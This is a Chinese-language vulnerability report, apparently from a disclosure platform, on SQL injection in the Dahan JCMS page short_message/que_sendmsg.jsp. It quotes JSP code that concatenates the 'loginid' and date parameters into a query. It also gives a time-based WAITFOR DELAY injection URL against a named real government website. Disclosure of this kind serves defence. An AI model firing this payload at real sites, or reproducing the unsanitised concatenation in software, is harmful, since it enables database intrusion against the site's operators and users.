### 简要描述: 大汉JCMS 注入漏洞3 ### 详细说明: short_message/que_sendmsg.jsp ``` String strTitle = ""; /*检索关键字*/ String groupname = ""; String id = Convert.getParameter(request, "loginid", "a");//获取参数 String boxtype = Convert.getParameter(request, "boxtype", "a"); strTitle += groupname; // 获取表单提交变量(条件参数) String strQueKeyWords = "";//关键字 String strQueKeyWords1 = "";//高级检索关键字 String strQueScope = "";//范围 String strStartDate = "";//开始日期 String strEndDate = "";//结束日期 strQueKeyWords = Convert.getParameter(request, "que_keywords"); strQueKeyWords1 = Convert.getParameter(request, "que_keywords1"); strQueScope = Convert.getParameter(request, "que_scope"); strStartDate = Convert.getParameter(request, "que_startdate"); strEndDate = Convert.getParameter(request, "que_enddate"); strQueKeyWords = (strQueKeyWords1.length() > 0) ? strQueKeyWords1 : strQueKeyWords;//高级检索的关键字优先 //组织时间条件 String strDateCond = ""; if (!"".equals(strStartDate) && !"".equals(strEndDate)) { strDateCond += " AND a.dt_sendtime >= '" +...
### 简要描述: 大汉JCMS 注入漏洞3 ### 详细说明: short_message/que_sendmsg.jsp ``` String strTitle = ""; /*检索关键字*/ String groupname = ""; String id = Convert.getParameter(request, "loginid", "a");//获取参数 String boxtype = Convert.getParameter(request, "boxtype", "a"); strTitle += groupname; // 获取表单提交变量(条件参数) String strQueKeyWords = "";//关键字 String strQueKeyWords1 = "";//高级检索关键字 String strQueScope = "";//范围 String strStartDate = "";//开始日期 String strEndDate = "";//结束日期 strQueKeyWords = Convert.getParameter(request, "que_keywords"); strQueKeyWords1 = Convert.getParameter(request, "que_keywords1"); strQueScope = Convert.getParameter(request, "que_scope"); strStartDate = Convert.getParameter(request, "que_startdate"); strEndDate = Convert.getParameter(request, "que_enddate"); strQueKeyWords = (strQueKeyWords1.length() > 0) ? strQueKeyWords1 : strQueKeyWords;//高级检索的关键字优先 //组织时间条件 String strDateCond = ""; if (!"".equals(strStartDate) && !"".equals(strEndDate)) { strDateCond += " AND a.dt_sendtime >= '" + strStartDate + " 00:00:00' AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'"; } else if (!"".equals(strStartDate) && "".equals(strEndDate)) { strDateCond += " AND a.dt_sendtime >= '" + strStartDate + " 00:00:00'"; } else if ("".equals(strStartDate) && !"".equals(strEndDate)) { strDateCond += " AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'"; } // 查询条件部分 StringBuffer sbWhere = new StringBuffer(128); strTitle = "当前位置→发件箱"; sbWhere.append(" a.vc_senderid='"+ id +"'");//插入参数 ``` ### 漏洞证明: 打开http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1 返回时间正常 打开http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1' ; WAITFOR DELAY '0:0:5'-- 延时了 [<img src="https://images.seebug.org/upload/201405/22011353c2daf83db4460dae72de1aa7be475adf.png" alt="dahan.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/22011353c2daf83db4460dae72de1aa7be475adf.png)
